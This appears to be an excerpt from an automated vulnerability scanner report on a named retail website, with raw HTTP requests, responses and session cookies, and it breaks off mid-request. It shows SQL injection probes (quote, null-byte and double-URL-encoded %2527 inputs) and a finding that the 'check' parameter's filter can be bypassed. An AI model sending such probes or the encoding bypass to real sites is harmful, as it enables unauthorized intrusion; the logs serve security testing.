GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc%00'&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:51:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:51:47 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225096227%3a%3bC25%5fEXP%3d1360065096%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:51:36 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225096227%3a%3bC25%5fEXP%3d1360065096%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:51:43 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22134%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24188%2c466%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310817103%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225096227%3a%3bC25%5fEXP%3d1360065096%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:51:43 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228703137%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cz%2f1Hpvzia3yZ7tqr69NFZ9CbZjI%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc%00''&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:51:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:51:48 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225108198%3a%3bC25%5fEXP%3d1360065108%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:51:48 GMT;Path=/


1.69. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [check parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The check parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the check parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the check request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n%2527&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; 
s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; 
WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:40:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:40:53 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224448271%3a%3bC25%5fEXP%3d1360064448%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:40:48 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224448271%3a%3bC25%5fEXP%3d1360064448%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:40:49 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%2240%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%2456%2c960%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816449%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224448271%3a%3bC25%5fEXP%3d1360064448%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:40:49 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228049079%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cULS6xF8iE3rEwtnNl%2ftRk6wz%2fa8%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n%2527%2527&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
